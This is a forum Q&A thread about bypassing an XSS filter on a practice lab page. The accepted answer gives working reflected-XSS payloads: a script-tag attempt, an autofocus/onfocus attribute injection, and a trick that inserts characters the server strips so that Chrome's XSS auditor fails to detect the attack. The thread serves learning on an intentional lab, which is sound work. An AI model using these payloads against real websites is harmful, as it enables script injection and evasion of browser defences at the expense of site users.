# Bypass XSS filter

Tags: xss

How can I bypass the XSS filter and pop an alert on this page:

http://leettime.net/xsslab1/stage--08.php

The script seem to filter single-quote (') on the server-side making it impossible for me to inject into the value field.

```
<input type="text" name="name" value=''></input>
```

This page is part of a XSS test series, so I am sure that it is possible to pop an alert somehow but I just don't know how.

Answer (score 0, accepted):

Enter a name and click submit. The form is submitted through a GET request so you can see the two parameters in the URL. Both are reflected in the HTML response.

name=spongebob&submit=

```
<font size=3>Enter Your Name here : <input type="text" name="name" value='spongebob'></input>
<input type="submit" name="submit" value="">
```

Instead of the name parameter focus on **submit**. It is enclosed in double quotes which aren't filtered. Because the character > is removed it is not possible to close the  tag so injection must occur inside it the tag. > is stripped away:

name=spongebob&submit=%22%3E%3Cscript%3Ealert(document.URL)%3C/script%3E

```
<input type="submit" name="submit" value=""<scriptalert(document.URL)</script">
```

It's possible to run javascript automatically by combining onfocus and autofocus.

name=spongebob&submit=%22%20autofocus%20onfocus=%22alert(document.URL)

```
<input type="submit" name="submit" value="" autofocus onfocus="(document.URL)">
```

This is a working XSS that will run automatically in Firefox but not in Chrome because Chrome's XSS auditor will detect it is a reflected XSS.

[Chrome XSS auditor reports that 'Token contains a reflecte XSS vector'](https://i.stack.imgur.com/CVaMe.png)

So let's use server side filtering of '>' to our advantage so Chrome can't detect that the submit parameter is reflected to the HTML.

name=spongebob&submit="%20auto>focus%20onf>ocus="alert(doc>ument.URL)

[Chrome XSS auditor bypassed using because of server side filtering](https://i.stack.imgur.com/Fy5nO.png)

Answer (score 0):

I was mistaken. There is additional form field that can be injected to complete the task.